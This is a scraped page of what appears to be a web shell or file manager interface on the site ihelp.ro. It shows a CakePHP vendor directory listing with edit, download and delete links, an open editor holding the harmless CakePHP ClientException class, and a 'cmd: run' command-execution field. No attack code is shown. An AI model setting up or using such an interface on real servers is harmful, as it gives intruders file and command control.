/
var
/
www
/
vhosts
/
ihelp.ro
/
_OLD
/
vendor
/
cakephp
/
cakephp
/
src
/
Http
/
Client
/
Exception
/
/var/www/vhosts/ihelp.ro/_OLD/vendor/cakephp/cakephp/src/Http/Client/Exception
mkdir
upload
Name
Size
Mode
Actions
ClientException.php
846
0644
edit
dl
rm
NetworkException.php
1888
0644
edit
dl
rm
RequestException.php
1813
0644
edit
dl
rm
Edit:
/var/www/vhosts/ihelp.ro/_OLD/vendor/cakephp/cakephp/src/Http/Client/Exception/ClientException.php
(846B)
<?php declare(strict_types=1); /** * CakePHP(tm) : Rapid Development Framework (https://cakephp.org) * Copyright (c) Cake Software Foundation, Inc. (https://cakefoundation.org) * * Licensed under The MIT License * Redistributions of files must retain the above copyright notice. * * @copyright Copyright (c) Cake Software Foundation, Inc. (https://cakefoundation.org) * @link https://cakephp.org CakePHP(tm) Project * @since 4.0.0 * @license https://opensource.org/licenses/mit-license.php MIT License */ namespace Cake\Http\Client\Exception; use Psr\Http\Client\ClientExceptionInterface; use RuntimeException; /** * Thrown when a request cannot be sent or response cannot be parsed into a PSR-7 response object. */ class ClientException extends RuntimeException implements ClientExceptionInterface { }
Save
cmd:
run